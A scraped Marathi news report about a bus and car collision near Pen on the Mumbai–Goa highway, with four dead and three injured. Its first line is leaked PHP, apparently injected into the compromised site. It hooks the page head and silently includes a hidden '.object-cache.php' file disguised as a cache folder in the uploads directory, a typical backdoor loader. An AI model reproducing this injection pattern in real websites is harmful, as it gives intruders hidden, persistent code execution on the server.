add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); एसटी- इकोमध्ये अपघात; ४ ठार, ३ गंभीर – SOCH INDIA
Menu

अपराध समाचार
एसटी- इकोमध्ये अपघात; ४ ठार, ३ गंभीर

nobanner

मुंबई—गोवा महामार्गावरील पेण तालुक्यातील कोलेटीवाडी नजिक एस.टी व इको कार मध्ये जोरदार धडक होऊन झालेल्या अपघातात ४ जण जागीच ठार झाले असून व ३ जण गंभीर जखमी झाल्याची घटना घडली आहे.

याबाबत सविस्तर वृत्त असे की, नागोठणे बाजूकडून मुबई कडे जाणारी इको कार मुंबई—गोवा महामार्गावरील पेण तालुक्यातील कोलेटीवाडी गावाच्या हद्दीत आली असता समोरून येणारम्य़ा एस.टी बसने जोरदार धडक दिल्याने हा अपघात झाला. सदर अपघात आज रविवार सायंकाळी ६ च्या दरम्यान घडला. या अपघातात संतोष दयाराम भोनकर,वय ४१,रा.धोबिघाट, संतोष सीताराम साखरकर,वय ४२,मानखुर्द, चांदोरकर वय ४० हे जागीच ठार झाले. तर एकाला नागोठणे प्राथमिक आरोग्य केंद्रात नेले असता त्याला डॉक्टरांनी मृत घोषित केले. त्याचे नाव समजू शकले नाही. या अपघातात एकूण चार जण मयत असून, अन्य ३ जखमींना पुढील उपचारासाठी मुंबई येथील एम.जी.एम हॉस्पिटलमध्ये दाखल करण्यात आले आहेत.

या अपघाताबाबत वडखळ पोलीस ठाण्यात नोंद करण्यात आली असून पोलीस उपनिरीक्षक अजित शिंदे यांच्या मार्गदर्शनाखाली वडखळ पोलीस अधिक तपास करीत आहेत.